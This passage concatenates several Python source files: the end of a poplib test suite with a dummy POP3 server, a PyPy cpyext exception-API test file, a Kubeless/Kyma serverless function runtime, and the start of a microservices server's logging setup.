self.push('+OK %s %s' % (arg, arg)) else: self.push('+OK') asynchat.async_chat.push(self, LIST_RESP) cmd_uidl = cmd_list def cmd_retr(self, arg): self.push('+OK %s bytes' %len(RETR_RESP)) asynchat.async_chat.push(self, RETR_RESP) cmd_top = cmd_retr def cmd_dele(self, arg): self.push('+OK message marked for deletion.') def cmd_noop(self, arg): self.push('+OK done nothing.') def cmd_rpop(self, arg): self.push('+OK done nothing.') def cmd_apop(self, arg): self.push('+OK done nothing.') def cmd_quit(self, arg): self.push('+OK closing.') self.close_when_done() def _get_capas(self): _capas = dict(self.CAPAS) if not self.tls_active and SUPPORTS_SSL: _capas['STLS'] = [] return _capas def cmd_capa(self, arg): self.push('+OK Capability list follows') if self._get_capas(): for cap, params in self._get_capas().items(): _ln = [cap] if params: _ln.extend(params) self.push(' '.join(_ln)) self.push('.') def cmd_utf8(self, arg): self.push('+OK I know RFC6856' if self.enable_UTF8 else '-ERR What is UTF8?!') if SUPPORTS_SSL: def cmd_stls(self, arg): if self.tls_active is False: self.push('+OK Begin TLS negotiation') context = ssl.SSLContext() context.load_cert_chain(CERTFILE) tls_sock = context.wrap_socket(self.socket, server_side=True, do_handshake_on_connect=False, suppress_ragged_eofs=False) 
self.del_channel() self.set_socket(tls_sock) self.tls_active = True self.tls_starting = True self.in_buffer = [] self._do_tls_handshake() else: self.push('-ERR Command not permitted when TLS active') def _do_tls_handshake(self): try: self.socket.do_handshake() except ssl.SSLError as err: if err.args[0] in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE): return elif err.args[0] == ssl.SSL_ERROR_EOF: return self.handle_close() # TODO: SSLError does not expose alert information elif "SSLV3_ALERT_BAD_CERTIFICATE" in err.args[1]: return self.handle_close() raise except OSError as err: if err.args[0] == errno.ECONNABORTED: return self.handle_close() else: self.tls_active = True self.tls_starting = False def handle_read(self): if self.tls_starting: self._do_tls_handshake() else: try: asynchat.async_chat.handle_read(self) except ssl.SSLEOFError: self.handle_close() class DummyPOP3Server(asyncore.dispatcher, threading.Thread): handler = DummyPOP3Handler def __init__(self, address, af=socket.AF_INET): threading.Thread.__init__(self) asyncore.dispatcher.__init__(self) self.create_socket(af, socket.SOCK_STREAM) self.bind(address) self.listen(5) self.active = False self.active_lock = threading.Lock() self.host, self.port = self.socket.getsockname()[:2] self.handler_instance = None def start(self): assert not self.active self.__flag = threading.Event() threading.Thread.start(self) self.__flag.wait() def run(self): self.active = True self.__flag.set() while self.active and asyncore.socket_map: self.active_lock.acquire() asyncore.loop(timeout=0.1, count=1) self.active_lock.release() asyncore.close_all(ignore_all=True) def stop(self): assert self.active self.active = False self.join() def handle_accepted(self, conn, addr): self.handler_instance = self.handler(conn) def handle_connect(self): self.close() handle_read = handle_connect def writable(self): return 0 def handle_error(self): raise class TestPOP3Class(TestCase): def assertOK(self, resp): self.assertTrue(resp.startswith(b"+OK")) def setUp(self): self.server = DummyPOP3Server((HOST, PORT)) self.server.start() self.client = poplib.POP3(self.server.host, self.server.port, timeout=3) def tearDown(self): self.client.close() self.server.stop() # Explicitly clear the attribute to prevent dangling thread self.server = None def test_getwelcome(self): self.assertEqual(self.client.getwelcome(), b'+OK dummy pop3 server ready. 
<timestamp>') def test_exceptions(self): self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo -err') def test_user(self): self.assertOK(self.client.user('guido')) self.assertRaises(poplib.error_proto, self.client.user, 'invalid') def test_pass_(self): self.assertOK(self.client.pass_('python')) self.assertRaises(poplib.error_proto, self.client.user, 'invalid') def test_stat(self): self.assertEqual(self.client.stat(), (10, 100)) def test_list(self): self.assertEqual(self.client.list()[1:], ([b'1 1', b'2 2', b'3 3', b'4 4', b'5 5'], 25)) self.assertTrue(self.client.list('1').endswith(b"OK 1 1")) def test_retr(self): expected = (b'+OK 116 bytes', [b'From: [email protected]', b'Content-Type: text/plain', b'MIME-Version: 1.0', b'Subject: Dummy', b'', b'line1', b'line2', b'line3'], 113) foo = self.client.retr('foo') self.assertEqual(foo, expected) def test_too_long_lines(self): self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo +%s' % ((poplib._MAXLINE + 10) * 'a')) def test_dele(self): self.assertOK(self.client.dele('foo')) def test_noop(self): self.assertOK(self.client.noop()) def test_rpop(self): self.assertOK(self.client.rpop('foo')) def test_apop(self): self.assertOK(self.client.apop('foo', 'dummypassword')) def test_top(self): expected = (b'+OK 116 bytes', [b'From: [email protected]', b'Content-Type: text/plain', b'MIME-Version: 1.0', b'Subject: Dummy', b'', b'line1', b'line2', b'line3'], 113) self.assertEqual(self.client.top(1, 1), expected) def test_uidl(self): self.client.uidl() self.client.uidl('foo') def test_utf8_raises_if_unsupported(self): self.server.handler.enable_UTF8 = False self.assertRaises(poplib.error_proto, self.client.utf8) def test_utf8(self): self.server.handler.enable_UTF8 = True expected = b'+OK I know RFC6856' result = self.client.utf8() self.assertEqual(result, expected) def test_capa(self): capa = self.client.capa() self.assertTrue('IMPLEMENTATION' in capa.keys()) def test_quit(self): resp = self.client.quit() self.assertTrue(resp) self.assertIsNone(self.client.sock) self.assertIsNone(self.client.file) @requires_ssl def test_stls_capa(self): capa = self.client.capa() self.assertTrue('STLS' in capa.keys()) @requires_ssl def test_stls(self): expected = b'+OK Begin TLS negotiation' resp = self.client.stls() self.assertEqual(resp, expected) @requires_ssl def test_stls_context(self): expected = b'+OK Begin TLS negotiation' ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) ctx.load_verify_locations(CAFILE) self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED) self.assertEqual(ctx.check_hostname, True) with self.assertRaises(ssl.CertificateError): resp = self.client.stls(context=ctx) self.client = poplib.POP3("localhost", self.server.port, timeout=3) resp = self.client.stls(context=ctx) self.assertEqual(resp, expected) if SUPPORTS_SSL: from test.test_ftplib import SSLConnection class DummyPOP3_SSLHandler(SSLConnection, DummyPOP3Handler): def __init__(self, conn): asynchat.async_chat.__init__(self, conn) self.secure_connection() self.set_terminator(b"\r\n") self.in_buffer = [] self.push('+OK dummy pop3 server ready. 
<timestamp>') self.tls_active = True self.tls_starting = False @requires_ssl class TestPOP3_SSLClass(TestPOP3Class): # repeat previous tests by using poplib.POP3_SSL def setUp(self): self.server = DummyPOP3Server((HOST, PORT)) self.server.handler = DummyPOP3_SSLHandler self.server.start() self.client = poplib.POP3_SSL(self.server.host, self.server.port) def test__all__(self): self.assertIn('POP3_SSL', poplib.__all__) def test_context(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host, self.server.port, keyfile=CERTFILE, context=ctx) self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host, self.server.port, certfile=CERTFILE, context=ctx) self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host, self.server.port, keyfile=CERTFILE, certfile=CERTFILE, context=ctx) self.client.quit() self.client = poplib.POP3_SSL(self.server.host, self.server.port, context=ctx) self.assertIsInstance(self.client.sock, ssl.SSLSocket) self.assertIs(self.client.sock.context, ctx) self.assertTrue(self.client.noop().startswith(b'+OK')) def test_stls(self): self.assertRaises(poplib.error_proto, self.client.stls) test_stls_context = test_stls def test_stls_capa(self): capa = self.client.capa() self.assertFalse('STLS' in capa.keys()) @requires_ssl class TestPOP3_TLSClass(TestPOP3Class): # repeat previous tests by using poplib.POP3.stls() def setUp(self): self.server = DummyPOP3Server((HOST, PORT)) self.server.start() self.client = poplib.POP3(self.server.host, self.server.port, timeout=3) self.client.stls() def tearDown(self): if self.client.file is not None and self.client.sock is not None: try: self.client.quit() except poplib.error_proto: # happens in the test_too_long_lines case; the overlong # response will be treated as response to QUIT and raise # this exception self.client.close() self.server.stop() # Explicitly clear the attribute to prevent dangling thread self.server = None def test_stls(self): self.assertRaises(poplib.error_proto, self.client.stls) test_stls_context = test_stls def test_stls_capa(self): capa = self.client.capa() self.assertFalse(b'STLS' in capa.keys()) class TestTimeouts(TestCase): def setUp(self): self.evt = threading.Event() self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(60) # Safety net. 
Look issue 11812 self.port = test_support.bind_port(self.sock) self.thread = threading.Thread(target=self.server, args=(self.evt,self.sock)) self.thread.setDaemon(True) self.thread.start() self.evt.wait() def tearDown(self): self.thread.join() # Explicitly clear the attribute to prevent dangling thread self.thread = None def server(self, evt, serv): serv.listen() evt.set() try: conn, addr = serv.accept() conn.send(b"+ Hola mundo\n") conn.close() except socket.timeout: pass finally: serv.close() def testTimeoutDefault(self): self.assertIsNone(socket.getdefaulttimeout()) socket.setdefaulttimeout(30) try: pop = poplib.POP3(HOST, self.port) finally: socket.setdefaulttimeout(None) self.assertEqual(pop.sock.gettimeout(), 30) pop.close() def testTimeoutNone(self): self.assertIsNone(socket.getdefaulttimeout()) socket.setdefaulttimeout(30) try: pop = poplib.POP3(HOST, self.port, timeout=None) finally: socket.setdefaulttimeout(None) self.assertIsNone(pop.sock.gettimeout()) pop.close() def testTimeoutValue(self): pop = poplib.POP3(HOST, self.port, timeout=30) self.assertEqual(pop.sock.gettimeout(), 30) pop.close() def test_main(): tests = [TestPOP3Class, TestTimeouts, TestPOP3_SSLClass, TestPOP3_TLSClass] thread_info = test_support.threading_setup() try: test_support.run_unittest(*tests) finally: test_support.threading_cleanup(*thread_info) if __name__ == '__main__': test_main()
test_pyerrors.py
import pytest import sys import StringIO from pypy.module.cpyext.state import State from pypy.module.cpyext.test.test_api import BaseApiTest from pypy.module.cpyext.test.test_cpyext import AppTestCpythonExtensionBase from rpython.rtyper.lltypesystem import rffi class TestExceptions(BaseApiTest): def test_GivenExceptionMatches(self, space, api): exc_matches = api.PyErr_GivenExceptionMatches string_exception = space.wrap('exception') instance = space.call_function(space.w_ValueError) assert exc_matches(string_exception, string_exception) assert exc_matches(instance, space.w_ValueError) assert exc_matches(space.w_ValueError, space.w_ValueError) assert exc_matches(space.w_IndexError, space.w_LookupError) assert not exc_matches(space.w_ValueError, space.w_LookupError) exceptions = space.newtuple([space.w_LookupError, space.w_ValueError]) assert exc_matches(space.w_ValueError, exceptions) def test_ExceptionMatches(self, space, api): api.PyErr_SetObject(space.w_ValueError, space.wrap("message")) assert api.PyErr_ExceptionMatches(space.w_Exception) assert api.PyErr_ExceptionMatches(space.w_ValueError) assert not api.PyErr_ExceptionMatches(space.w_TypeError) api.PyErr_Clear() def test_Occurred(self, space, api): assert not api.PyErr_Occurred() string = rffi.str2charp("spam and eggs") api.PyErr_SetString(space.w_ValueError, string) rffi.free_charp(string) assert api.PyErr_Occurred() is space.w_ValueError api.PyErr_Clear() def test_SetObject(self, space, api): api.PyErr_SetObject(space.w_ValueError, space.wrap("a value")) assert api.PyErr_Occurred() is space.w_ValueError state = space.fromcache(State) operror = state.get_exception() assert space.eq_w(operror.get_w_value(space), space.wrap("a value")) api.PyErr_Clear() def test_SetNone(self, space, api): api.PyErr_SetNone(space.w_KeyError) state = space.fromcache(State) operror = state.get_exception() assert space.eq_w(operror.w_type, space.w_KeyError) assert space.eq_w(operror.get_w_value(space), space.w_None) api.PyErr_Clear() api.PyErr_NoMemory() operror = state.get_exception() assert space.eq_w(operror.w_type, space.w_MemoryError) api.PyErr_Clear() def test_Warning(self, space, api, capfd): message = rffi.str2charp("this is a warning") api.PyErr_WarnEx(None, message, 1) space.call_method(space.sys.get('stderr'), "flush") out, err = capfd.readouterr() assert ": UserWarning: this is a warning" in err rffi.free_charp(message) def test_print_err(self, space, api, capfd): api.PyErr_SetObject(space.w_Exception, space.wrap("cpyext is cool")) api.PyErr_Print() space.call_method(space.sys.get('stderr'), "flush") out, err = capfd.readouterr() assert "cpyext is cool" in err assert not api.PyErr_Occurred() def test_WriteUnraisable(self, space, api, capfd): api.PyErr_SetObject(space.w_ValueError, space.wrap("message")) w_where = space.wrap("location") api.PyErr_WriteUnraisable(w_where) space.call_method(space.sys.get('stderr'), "flush") out, err = capfd.readouterr() assert "Exception ignored in: 'location'\nValueError: message" == err.strip() @pytest.mark.skipif(True, reason='not implemented yet') def test_interrupt_occurred(self, space, api): assert not api.PyOS_InterruptOccurred() import signal, os recieved = [] def default_int_handler(*args): recieved.append('ok') signal.signal(signal.SIGINT, default_int_handler) os.kill(os.getpid(), signal.SIGINT) assert recieved == ['ok'] assert api.PyOS_InterruptOccurred() class AppTestFetch(AppTestCpythonExtensionBase): def setup_class(cls): from pypy.interpreter.test.test_fsencode import get_special_char space = 
cls.space cls.special_char = get_special_char() cls.w_special_char = space.wrap(cls.special_char) AppTestCpythonExtensionBase.setup_class.im_func(cls) def test_occurred(self): module = self.import_extension('foo', [ ("check_error", "METH_NOARGS", ''' PyErr_SetString(PyExc_TypeError, "message"); PyErr_Occurred(); PyErr_Clear(); Py_RETURN_TRUE; ''' ), ]) assert module.check_error() def test_fetch_and_restore(self): module = self.import_extension('foo', [ ("check_error", "METH_NOARGS", ''' PyObject *type, *val, *tb; PyErr_SetString(PyExc_TypeError, "message"); PyErr_Fetch(&type, &val, &tb); if (PyErr_Occurred()) return NULL; if (type != PyExc_TypeError) Py_RETURN_FALSE; PyErr_Restore(type, val, tb); if (!PyErr_Occurred()) Py_RETURN_FALSE; PyErr_Clear(); Py_RETURN_TRUE; ''' ), ]) assert module.check_error() def test_normalize(self): module = self.import_extension('foo', [ ("check_error", "METH_NOARGS", ''' PyObject *type, *val, *tb; PyErr_SetString(PyExc_TypeError, "message"); PyErr_Fetch(&type, &val, &tb); if (type != PyExc_TypeError) Py_RETURN_FALSE; if (!PyUnicode_Check(val)) Py_RETURN_FALSE; /* Normalize */ PyErr_NormalizeException(&type, &val, &tb); if (type != PyExc_TypeError) Py_RETURN_FALSE; if ((PyObject*)Py_TYPE(val) != PyExc_TypeError) Py_RETURN_FALSE; /* Normalize again */ PyErr_NormalizeException(&type, &val, &tb); if (type != PyExc_TypeError) Py_RETURN_FALSE; if ((PyObject*)Py_TYPE(val) != PyExc_TypeError) Py_RETURN_FALSE; PyErr_Restore(type, val, tb); PyErr_Clear(); Py_RETURN_TRUE; ''' ), ]) assert module.check_error() def test_normalize_no_exception(self): module = self.import_extension('foo', [ ("check_error", "METH_NOARGS", ''' PyObject *type, *val, *tb; PyErr_Fetch(&type, &val, &tb); if (type != NULL) Py_RETURN_FALSE; if (val != NULL) Py_RETURN_FALSE; PyErr_NormalizeException(&type, &val, &tb); Py_RETURN_TRUE; ''' ), ]) assert module.check_error() def test_SetFromErrno(self): import sys if sys.platform != 'win32': skip("callbacks through ll2ctypes modify errno") import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' errno = EBADF; PyErr_SetFromErrno(PyExc_OSError); return NULL; '''), ], prologue="#include <errno.h>") try: module.set_from_errno() except OSError as e: assert e.errno == errno.EBADF assert e.strerror == os.strerror(errno.EBADF) assert e.filename is None def test_SetFromErrnoWithFilename(self): char = self.special_char if char is None: char = "a" # boring import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' errno = EBADF; PyErr_SetFromErrnoWithFilename(PyExc_OSError, "/path/to/file"); return NULL; '''), ("set_from_errno_special", "METH_NOARGS", ''' errno = EBADF; PyErr_SetFromErrnoWithFilename(PyExc_OSError, "/path/to/%s"); return NULL; ''' % (char, )), ], prologue="#include <errno.h>") exc_info = raises(OSError, module.set_from_errno) assert exc_info.value.filename == "/path/to/file" assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) exc_info = raises(OSError, module.set_from_errno_special) assert exc_info.value.filename == "/path/to/%s" % (char, ) assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) def test_SetFromErrnoWithFilename_NULL(self): import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' errno = EBADF; PyErr_SetFromErrnoWithFilename(PyExc_OSError, NULL); return NULL; '''), ], prologue="#include <errno.h>") exc_info = raises(OSError, 
module.set_from_errno) assert exc_info.value.filename is None assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) def test_SetFromErrnoWithFilenameObject__PyUnicode(self): import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' PyObject *filenameObject = PyUnicode_FromString("/path/to/file"); errno = EBADF; PyErr_SetFromErrnoWithFilenameObject(PyExc_OSError, filenameObject); Py_DECREF(filenameObject); return NULL; '''), ], prologue="#include <errno.h>") exc_info = raises(OSError, module.set_from_errno) assert exc_info.value.filename == "/path/to/file" assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) def test_SetFromErrnoWithFilenameObject__PyLong(self): import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' PyObject *intObject = PyLong_FromLong(3); errno = EBADF; PyErr_SetFromErrnoWithFilenameObject(PyExc_OSError, intObject); Py_DECREF(intObject); return NULL; '''), ], prologue="#include <errno.h>") exc_info = raises(OSError, module.set_from_errno) assert exc_info.value.filename == 3 assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) def test_SetFromErrnoWithFilenameObject__PyList(self): import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' PyObject *lst = Py_BuildValue("[iis]", 1, 2, "three"); errno = EBADF; PyErr_SetFromErrnoWithFilenameObject(PyExc_OSError, lst); Py_DECREF(lst); return NULL; '''), ], prologue="#include <errno.h>") exc_info = raises(OSError, module.set_from_errno) assert exc_info.value.filename == [1, 2, "three"] assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) def test_SetFromErrnoWithFilenameObject__PyTuple(self): import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' PyObject *tuple = Py_BuildValue("(iis)", 1, 2, "three"); errno = EBADF; PyErr_SetFromErrnoWithFilenameObject(PyExc_OSError, tuple); Py_DECREF(tuple); return NULL; '''), ], prologue="#include <errno.h>") exc_info = raises(OSError, module.set_from_errno) assert exc_info.value.filename == (1, 2, "three") assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) def test_SetFromErrnoWithFilenameObject__Py_None(self): import errno, os module = self.import_extension('foo', [ ("set_from_errno", "METH_NOARGS", ''' PyObject *none = Py_BuildValue(""); errno = EBADF; PyErr_SetFromErrnoWithFilenameObject(PyExc_OSError, none); Py_DECREF(none); return NULL; '''), ], prologue="#include <errno.h>") exc_info = raises(OSError, module.set_from_errno) assert exc_info.value.filename is None assert exc_info.value.errno == errno.EBADF assert exc_info.value.strerror == os.strerror(errno.EBADF) def test_PyErr_Display(self): from sys import version_info if self.runappdirect and (version_info.major < 3 or version_info.minor < 3): skip('PyErr_{GS}etExcInfo introduced in python 3.3') module = self.import_extension('foo', [ ("display_error", "METH_VARARGS", r''' PyObject *type, *val, *tb; PyErr_GetExcInfo(&type, &val, &tb); PyErr_Display(type, val, tb); Py_XDECREF(type); Py_XDECREF(val); Py_XDECREF(tb); Py_RETURN_NONE; '''), ]) import io, sys sys.stderr = io.StringIO() try: 1 / 0 except ZeroDivisionError: module.display_error() finally: output = sys.stderr.getvalue() sys.stderr = sys.__stderr__ assert "in test_PyErr_Display\n" in 
output assert "ZeroDivisionError" in output @pytest.mark.skipif(True, reason= "XXX seems to pass, but doesn't: 'py.test -s' shows errors in PyObject_Free") def test_GetSetExcInfo(self): import sys if self.runappdirect and (sys.version_info.major < 3 or sys.version_info.minor < 3): skip('PyErr_{GS}etExcInfo introduced in python 3.3') module = self.import_extension('foo', [ ("getset_exc_info", "METH_VARARGS", r''' PyObject *type, *val, *tb; PyObject *new_type, *new_val, *new_tb; PyObject *result; if (!PyArg_ParseTuple(args, "OOO", &new_type, &new_val, &new_tb)) return NULL; PyErr_GetExcInfo(&type, &val, &tb); Py_INCREF(new_type); Py_INCREF(new_val); Py_INCREF(new_tb); PyErr_SetExcInfo(new_type, new_val, new_tb); result = Py_BuildValue("OOO", type ? type : Py_None, val ? val : Py_None, tb ? tb : Py_None); Py_XDECREF(type); Py_XDECREF(val); Py_XDECREF(tb); return result; ''' ), ]) try: raise ValueError(5) except ValueError as old_exc: new_exc = TypeError("TEST") orig_sys_exc_info = sys.exc_info() orig_exc_info = module.getset_exc_info(new_exc.__class__, new_exc, None) new_sys_exc_info = sys.exc_info() new_exc_info = module.getset_exc_info(*orig_exc_info) reset_sys_exc_info = sys.exc_info() assert orig_exc_info[0] is old_exc.__class__ assert orig_exc_info[1] is old_exc assert orig_exc_info == orig_sys_exc_info assert orig_exc_info == reset_sys_exc_info assert new_exc_info == (new_exc.__class__, new_exc, None) assert new_exc_info == new_sys_exc_info def test_PyErr_WarnFormat(self): import warnings module = self.import_extension('foo', [ ("test", "METH_NOARGS", ''' PyErr_WarnFormat(PyExc_UserWarning, 1, "foo %d bar", 42); Py_RETURN_NONE; '''), ]) with warnings.catch_warnings(record=True) as l: module.test() assert len(l) == 1 assert "foo 42 bar" in str(l[0]) def test_StopIteration_value(self): module = self.import_extension('foo', [ ("test", "METH_O", ''' PyObject *o = ((PyStopIterationObject *)args)->value; Py_INCREF(o); return o; '''), ]) res = module.test(StopIteration("foo!")) assert res == "foo!" def test_PyErr_BadInternalCall(self): # NB. it only seemed to fail when run with '-s'... but I think # that it always printed stuff to stderr module = self.import_extension('foo', [ ("oops", "METH_NOARGS", r''' PyErr_BadInternalCall(); return NULL; '''), ]) raises(SystemError, module.oops) @pytest.mark.skipif("not config.option.runappdirect", reason='-A only') def test_error_thread_race(self): # Check race condition: thread 0 returns from cpyext with error set, # after thread 1 has set an error but before it returns. module = self.import_extension('foo', [ ("emit_error", "METH_VARARGS", ''' PyThreadState *save = NULL; PyGILState_STATE gilsave; /* NB. synchronization due to GIL */ static volatile int flag = 0; int id; if (!PyArg_ParseTuple(args, "i", &id)) return NULL; /* Proceed in thread 1 first */ save = PyEval_SaveThread(); while (id == 0 && flag == 0); gilsave = PyGILState_Ensure(); PyErr_Format(PyExc_ValueError, "%d", id); /* Proceed in thread 0 first */ if (id == 1) flag = 1; PyGILState_Release(gilsave); while (id == 1 && flag == 1); PyEval_RestoreThread(save); if (id == 0) flag = 0; return NULL; ''' ), ]) import threading failures = [] def worker(arg): try: module.emit_error(arg) failures.append(True) except Exception as exc: if str(exc) != str(arg): failures.append(exc) threads = [threading.Thread(target=worker, args=(j,)) for j in (0, 1)] for t in threads: t.start() for t in threads: t.join() assert not failures
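The assertions above mirror CPython's exception-matching rules. As a rough, standalone sketch (not part of the PyPy test suite; the helper name is illustrative), the semantics asserted for PyErr_GivenExceptionMatches can be expressed with plain Python builtins:

def given_exception_matches(given, exc):
    """Rough pure-Python analogue: an exception matches its own class, any of
    its base classes, and any tuple containing a matching class."""
    if isinstance(exc, tuple):
        return any(given_exception_matches(given, e) for e in exc)
    if isinstance(given, BaseException):
        given = type(given)
    if isinstance(given, type) and isinstance(exc, type):
        return issubclass(given, exc)
    # Non-class "exceptions" (e.g. a plain string) only match the same object.
    return given is exc

assert given_exception_matches(ValueError(), ValueError)
assert given_exception_matches(IndexError, LookupError)
assert not given_exception_matches(ValueError, LookupError)
assert given_exception_matches(ValueError, (LookupError, ValueError))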
kubeless.py
#!/usr/bin/env python
import importlib
import os
import queue
import threading

import bottle
import prometheus_client as prom
import sys
import tracing

from ce import Event
from tracing import set_req_context


def create_service_name(pod_name: str, service_namespace: str) -> str:
    # remove the generated pod suffix (the last two sections)
    deployment_name = '-'.join(pod_name.split('-')[0:pod_name.count('-') - 1])
    return '.'.join([deployment_name, service_namespace])


# The reason this file has an underscore prefix in its name is to avoid a
# name collision with the user-defined module.
module_name = os.getenv('MOD_NAME')
if module_name is None:
    print('MOD_NAME must be provided', flush=True)
    exit(1)
current_mod = os.path.basename(__file__).split('.')[0]
if module_name == current_mod:
    print('Module cannot be named {} like the current module'.format(current_mod), flush=True)
    exit(2)
sys.path.append('/kubeless')
mod = importlib.import_module(module_name)

func_name = os.getenv('FUNC_HANDLER')
if func_name is None:
    print('FUNC_HANDLER must be provided', flush=True)
    exit(3)
func = getattr(mod, os.getenv('FUNC_HANDLER'))

func_port = os.getenv('FUNC_PORT', 8080)
timeout = float(os.getenv('FUNC_TIMEOUT', 180))
memfile_max = int(os.getenv('FUNC_MEMFILE_MAX', 100 * 1024 * 1024))
bottle.BaseRequest.MEMFILE_MAX = memfile_max

app = application = bottle.app()

function_context = {
    'function-name': func.__name__,
    'timeout': timeout,
    'runtime': os.getenv('FUNC_RUNTIME'),
    'memory-limit': os.getenv('FUNC_MEMORY_LIMIT'),
}

jaeger_endpoint = os.getenv('JAEGER_SERVICE_ENDPOINT')
pod_name = os.getenv('HOSTNAME')
service_namespace = os.getenv('SERVICE_NAMESPACE')
service_name = create_service_name(pod_name, service_namespace)

tracer_provider = None
# Avoid creating several tracer providers when the server starts forking.
if __name__ == "__main__":
    tracer_provider = tracing.ServerlessTracerProvider(jaeger_endpoint, service_name)


def func_with_context(e, function_context):
    ex = e.ceHeaders["extensions"]
    with set_req_context(ex["request"]):
        return func(e, function_context)


@app.get('/healthz')
def healthz():
    return 'OK'


@app.get('/metrics')
def metrics():
    bottle.response.content_type = prom.CONTENT_TYPE_LATEST
    return prom.generate_latest(prom.REGISTRY)


@app.error(500)
def exception_handler():
    return 'Internal server error'


@app.route('/<:re:.*>', method=['GET', 'POST', 'PATCH', 'DELETE'])
def handler():
    req = bottle.request
    tracer = tracer_provider.get_tracer(req)
    event = Event(req, tracer)
    method = req.method
    func_calls.labels(method).inc()
    with func_errors.labels(method).count_exceptions():
        with func_hist.labels(method).time():
            que = queue.Queue()
            t = threading.Thread(
                target=lambda q, e: q.put(func_with_context(e, function_context)),
                args=(que, event))
            t.start()
            try:
                res = que.get(block=True, timeout=timeout)
            except queue.Empty:
                return bottle.HTTPError(408, "Timeout while processing the function")
            else:
                t.join()
                return res


def preload():
    """This is a no-op function used to start the forkserver."""
    pass


if __name__ == '__main__':
    import logging
    import multiprocessing as mp
    import requestlogger

    mp_context = os.getenv('MP_CONTEXT', 'forkserver')
    if mp_context == "fork":
        raise ValueError(
            '"fork" multiprocessing context is not supported because cherrypy is a '
            'multithreaded server and safely forking a multithreaded process is '
            'problematic'
        )
    if mp_context not in ["forkserver", "spawn"]:
        raise ValueError(
            f'"{mp_context}" is an invalid multiprocessing context. Possible values '
            'are "forkserver" and "spawn"'
        )

    try:
        ctx = mp.get_context(mp_context)
        if ctx.get_start_method() == 'forkserver':
            # Preload the current module and consequently also the user-defined module
            # so that all the child processes forked from the forkserver in response to
            # a request immediately have access to the global data in the user-defined
            # module without having to load it for every request.
            ctx.set_forkserver_preload([current_mod])
            # Start the forkserver before we start accepting requests.
            d = ctx.Process(target=preload)
            d.start()
            d.join()
    except ValueError:
        # Default to 'spawn' if 'forkserver' is unavailable.
        ctx = mp.get_context('spawn')
        logging.warning(
            f'"{mp_context}" multiprocessing context is unavailable. Using "spawn"'
        )

    func_hist = prom.Histogram(
        'function_duration_seconds', 'Duration of user function in seconds', ['method']
    )
    func_calls = prom.Counter(
        'function_calls_total', 'Number of calls to user function', ['method']
    )
    func_errors = prom.Counter(
        'function_failures_total', 'Number of exceptions in user function', ['method']
    )

    # added by Kyma team
    if os.getenv('KYMA_INTERNAL_LOGGER_ENABLED'):
        # default that has been used so far
        loggedapp = requestlogger.WSGILogger(
            app,
            [logging.StreamHandler(stream=sys.stdout)],
            requestlogger.ApacheFormatter(),
        )
    else:
        loggedapp = app
    # end of modified section

    bottle.run(
        loggedapp,
        server='cherrypy',
        host='0.0.0.0',
        port=func_port,
        # Set this flag to True to auto-reload the server after any source files change
        reloader=os.getenv('CHERRYPY_RELOADED', False),
        # Number of requests that can be handled in parallel (default = 50).
        numthreads=int(os.getenv('CHERRYPY_NUMTHREADS', 50)),
        quiet='KYMA_BOTTLE_QUIET_OPTION_DISABLED' not in os.environ,
    )
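For reference, here is a minimal, self-contained sketch of the worker-thread/queue timeout pattern that handler() relies on; run_with_timeout and the demo callables are illustrative names, not part of the runtime:

import queue
import threading
import time

def run_with_timeout(fn, timeout_seconds):
    # Run fn on a worker thread and wait at most timeout_seconds for its result,
    # mirroring the queue/thread pattern used in handler() above.
    que = queue.Queue()
    t = threading.Thread(target=lambda q: q.put(fn()), args=(que,))
    t.start()
    try:
        return que.get(block=True, timeout=timeout_seconds)
    except queue.Empty:
        return "408: timeout while processing the function"

print(run_with_timeout(lambda: "fast result", timeout_seconds=1.0))
print(run_with_timeout(lambda: time.sleep(2) or "slow result", timeout_seconds=0.5))

Note that, as in handler(), the worker thread keeps running after the timeout; only the response is cut short.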
main_microservices_server.py
# Policy
"""
! : command for the microservices main server
> : request for a nonexistent Communication; expects a verification output
$ : answer to an existing Communication
* : an issue/error
V : validation (sent when the server confirms it received a request)
CLOSE : sent when a socket is closed by !DISCONNECT

Structure for answers (V or $):
V
"""
import socket
import threading
import logging
import logging.handlers
import time
import sys

PORT_SERV = 5050
PORT_CLIENT = 5051
HEADER = 64
HOST = "localhost"
FORMAT = "utf-8"

from os import getcwd
if getcwd() == "C:\\Users\\lucie\\Documents\\Projets code\\auction-bot-rewrite":
    logs_directory = "C:/Users/lucie/Documents/Projets code/auction-bot-rewrite/logs/"
else:
    logs_directory = "/home/ubuntu/logs/"

#init the handlers
r_file_handler_info = logging.handlers.RotatingFileHandler(
    filename=logs_directory + 'MMS_info.log',
    mode='a',
    maxBytes=5*1024*1024,
    backupCount=1,
    encoding="utf-8",
    delay=0
)
r_file_handler_info.setLevel(logging.INFO)

r_file_handler_debug = logging.handlers.RotatingFileHandler(
    filename=logs_directory + 'MMS_debug.log',
